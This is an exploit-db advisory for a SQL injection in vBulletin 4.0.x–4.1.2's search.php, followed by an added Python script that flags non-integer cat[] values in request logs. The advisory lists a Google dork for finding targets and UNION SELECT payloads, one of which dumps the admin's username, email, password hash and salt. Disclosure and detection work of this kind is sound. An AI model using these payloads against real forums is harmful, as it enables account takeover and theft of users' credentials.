vBulletin 4.0.x => 4.1.2 – ‘search.php’ SQL Injection

  • Author: D4rkB1t
    Date: 2011-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17314/
  • ====================================================================
    # vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability #
    ====================================================================
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    ====================================================================
    
    #[+] Discovered By : D4rkB1t
    #[+] Site: NaN
    #[+] support e-mail: d4rkb1t@live.com
    
    
    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"
    
    --------------------------
    # ~Vulnerable Code~ #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;
    
    --------------------------
    #~Exploit~ #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"
    
    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    
    More info: http://j0hnx3r.org/?p=818
    
    --------------------------
    #~Advice~#
    --------------------------
    The vendor has already released a patch in vB 4.1.3.
    UPDATE NOW!
    
    ====================================================================
    # 1337day.com [2011-5-21]
    ====================================================================
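
A detection check for the request shape shown under Exploit, added here as an example and not part of the original advisory or of vBulletin's code: it flags POSTs to search.php whose cat[] values are not plain integers. The (client, path, body) log layout, the 10-digit limit on category ids and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Array-style parameter named in the advisory: cat[0], cat[1], cat[] ...
CAT_KEY = re.compile(r"cat\[\d*\]")
# Assumption: a legitimate category id is a short run of ASCII digits.
INT_VALUE = re.compile(r"[0-9]{1,10}")


def suspicious_cat_params(post_body):
    """Return (key, value) pairs where a cat[] value is not a plain integer."""
    hits = []
    # parse_qsl URL-decodes keys and values; blank values are dropped.
    for key, value in parse_qsl(post_body):
        if CAT_KEY.fullmatch(key) and not INT_VALUE.fullmatch(value):
            hits.append((key, value))
    return hits


def scan(records):
    """records: iterable of (client, path, body) tuples from a request log."""
    findings = []
    for client, path, body in records:
        # Only the endpoint named in the advisory is inspected.
        if path.split("?", 1)[0].endswith("search.php"):
            for key, value in suspicious_cat_params(body):
                findings.append((client, key, value))
    return findings


# Constructed sample records (documentation-range addresses, not real traffic).
SAMPLE = [
    ("192.0.2.10", "/search.php?do=process",
     "search_type=1&cat%5B0%5D=4&cat%5B1%5D=12"),
    ("198.51.100.7", "/search.php?do=process",
     "search_type=1&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23"),
    ("198.51.100.7", "/forum.php", "cat%5B0%5D=abc"),
]

if __name__ == "__main__":
    for client, key, value in scan(SAMPLE):
        print(f"{client} sent non-integer {key}: {value!r}")
```

The same integer-only rule, applied server-side to every element of cat[] before it reaches a query, is the input check this class of bug calls for; upgrading to the patched release remains the fix.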